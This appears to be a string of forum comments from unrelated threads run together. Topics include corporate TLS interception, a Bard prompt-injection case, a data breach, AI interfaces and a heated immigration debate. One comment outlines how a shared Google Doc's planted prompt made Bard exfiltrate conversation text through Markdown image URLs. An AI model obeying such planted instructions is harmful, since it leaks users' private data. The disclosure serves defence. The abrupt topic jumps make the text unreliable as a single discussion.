I don't think a modern firewall can MiTM HTTPS TLS without triggering a "Warning: Potential Security Risk Ahead" (Firefox) or "Your connection is not private" (Chrome).
I don't think _any_ firewall can MITM traffic without this happening unless you install the appropriate certificate in each client machine's trust store. I bet that with the advent of such all-in-one solutions as Fortinet or Cisco VPNs that this would be handled automatically. If not I'm sure an endpoint management solution could be coaxed into doing this via some glue scripts. I haven't been an "IT guy" in a decade-plus but I'd be surprised if this wasn't within reach fairly easily these days.
Yeah, that's what the IT at my company did. Installed Zscaler, rolled out a new root cert to Chrome, and then told people to configure the remaining apps they use to use the organization's root cert.
Which is why corporates who do this also use MDM to ensure that certs for the firewall/reverse proxy are installed on endpoints, RADIUS at network access points to authenticate devices by certificates and endpoint protection software to send nasty-grams if you fuck around.
That’s been my experience. The difference being in a corporate environment they can push policies to all employee endpoints that make this happen with no scary warning (trust the internal CA, etc).
Regarding SSH, the MitM would generate a new host key for the actual host you try to connect to. meaning when the MitM existed in the first place and you trusted the host key then (adding it to your Known_hosts), you will not get any additional security warning.
This can of course be avoided by the organization by distributing host keys to the client beforehand as they (maybe) would if the host keys were the actual keys from the host stored in /etc/ssh.
Correct. Companies that implement such a firewall must also install their own trust stores on the machines on the network. This can be a problem when you try to use some software that uses its own trust store from a public source like Mozilla (e.g. Python libraries).
It really makes you think how much your security hinges on that trust store yet it's something most people aren't even aware exists, let alone inspected themselves.
Pretty sure you still can, it just requires that the client system trusts the CA being used to sign the MITM certs. That obviously limits the cases where it works, but not to zero.
I don't for a moment believe that that's the reason (more likely, it's the apps trying to prevent reverse engineering), but yes, there's a bit of a cat/mouse game where you can read traffic but HTTPS prevents that but you can add a custom CA but apps can pin certs but you can modify the app to fix that. But I suspect that for the appliance case, a business can just require that the vendor allow a custom CA and block any traffic they can't decrypt.
In cases where I trust both the communication endpoints, e.g. an employee trying to SSH into an internal host, "trust" being established by other parameters that are not relevant to the firewall, why would I MitM such a connection?
At work I use a VPN to access the internal network, I then have to traverse multiple firewalls and a MitM breaking up my SSH connection in order to connect to a host running a webserver.
I have yet to understand how the MitM would increase security. Extra (well minus) points if the appliance in question auto-updates from the vendor's repository, offering no insight into the inner workings.
They can pin certs, but at least you know that you can't see that traffic and make a policy decision about allowing it anyways or trying to force the vendor to drop it.
The next level is to have another layer of encryption and wrap that in the TLS/SSH, and maybe use steganography to make it appear legitimate. Much harder to detect.
That stuff fundamentally does not work against anybody with enough of a clue to be playing tunneling games (or using ssh) in the first place. If you have any significant control over both ends of the connection, then it's trivial to obfuscate anything you want so that the firewall can't detect it.
... and those boxes, all of them, have a really bad history of security bugs themselves.
The risks you're taking by undermining the cryptography and putting random unnecessary devices in positions of trust are almost always greater than the risks you mitigate. What you're really buying with those devices is the illusion of control and/or the ability to claim you "tried".
TLDR: Bard will render Markdown images in conversations. Bard can also read the contents of your Google docs to give responses more context. By sharing a Google Doc containing a malicious prompt with a victim you could get Bard to generate Markdown image links with URL parameters containing URL encoded sections of your conversation. These sections of the conversation can then be exfiltrated when the Bard UI attempts to load the images by reaching out to the URL the attacker had Bard previously create.
Moral of the story: be careful what your AI assistant reads, it could be controlled by an attacker and contain hypnotic suggestions.
Hopefully it'll be tightly scoped and not like, hey I need access to read/create/modify/delete all your calendar events and contacts just so I can check if you are busy
Not everything is meant literally. When he says they ended up with $0 doesn't have to be $0, just hugely down and nearly worthless compared to before that was doing well.
In the same way $100M could just have been $99M or even $80M, and then $0 they started with could just as well have been $20K in savings he invested.
Assuming screenshot is real[0], they have over 1PB in their Google Drive, so chances are everyone just uses Google Drive with shared drives, and employees use Drive for Desktop (previously drive file stream)[1]. Shared drives are pretty powerful and access to them can be gated at the same level as you can regular Drive files.
My theory is that some high-level IT person either got phished and didn't have hardware 2fa, or that high-level IT person downloaded malware / got RAT'd and the Google Drive scanning was done in the background on their machine. Depending on the hierarchy, it might not have even been a scan, could've been the attackers sating their curiosity by browsing through all their internal files and happening to find some PAM credentials.
Maybe just clicking around until they found something. That's what many employees do on a daily basis looking for files on network drives, so nothing that would be noticed easily.
>Anyone who can articulate their ideas in language can implement them
I'd be shocked if even 10% of the users who can't navigate a GUI could accurately describe what they want the software to do. To the user who doesn't know they can use Ctrl-Z to undo, the first half dozen times the AI mangles their inherited spreadsheet might be enough to put them off the idea.
I’ve been thinking for a while about a common people programming language able to interface with machines with pure casual conversation ( not exact commands) and I feel something it’s coming in the next decades even if not earlier. Imagine the ability to casually chat with a widget which understands flawlessly and where most devices would be able to communicate as well. This could eventually be used in psychotherapy, everything automation around humans and in nefarious ways as well. I’m only hopeful of a human augmentation scenario but there are countless ways it could become totally different.
Certainly there is a huge middle ground. Vague, but common, use cases might have more articulate versions of the commands inferred. I find myself learning new tools all the time - I certainly have enough domain knowledge of many things to express intent without describing implementation. I suspect plenty of people are similar enough - just operating at different levels of abstraction.
What I find more concerning would be people operating under misconceptions, or being more precise than needed, thus not actually accomplishing their objective with the introduction of irrelevant detail.
This is a shockingly coherent summary. The accuracy leaves a bit to be desired, but this is perfectly usable for distilling things you don't have time to fully evaluate.
I felt the same. I read the full article. Then, I returned to HN. I was surprised to see the top post was talking about GPT-3(!). Then, I read the GPT-3 summary. I think: "Hey, not bad! This could be a real tool for everyday use!"
Please go physically visit Auschwitz, tour the grounds and museum exhibits illustrating the genuine horrors perpetuated there, and then see if your offensively ignorant misuse of the term "concentration camp" still seems appropriate to you.
I am a Jew and I have studied this and visited camps. I just visited the site of one in France. It is quite clear that needing to separate what has happened to children and families on the southern border from that which happened to, say, the Roma during the Reich is suspicious. No one will be held accountable.
History will eventually regard the imperialist behavior of the US quite negatively. This is no comparison to Hitler’s Germany but it’s intellectually dishonest to ignore that they designed the racial Nuremberg laws on Jim Crow America. Racism, segregation, and the like are an intrinsic part of American history and one of its exports.
We built concentration camps for Japanese during the war and nothing came of that either.
The border enforcement is not in and of itself imperialist. This is a bad faith engagement with what I think is a pretty clear argument.
Our border enforcement is a small piece of a much larger program of imperialism. We overthrow and destabilize central and South American governments which are not sufficiently pliant client states. Then we make a show of rejecting groups fleeing those conditions even though the vast majority of undocumented immigration does not happen via border crossing.
The current ubiquity of child abuse in the US ICE camps is shocking. However, if the bar is “not as bad as Hitler while he was losing the war”, then I agree there’s a long way to fall.
Heck, ICE doctors haven’t been caught performing forced hysterectomies for almost two years:
“Caught” is not a synonym for “unsupported anonymous allegations by immigration activists”.
It’s insulting, naive, and simply wrong to suggest an equivalence to our enforcement of immigration law on people voluntarily emigrating to the United States.
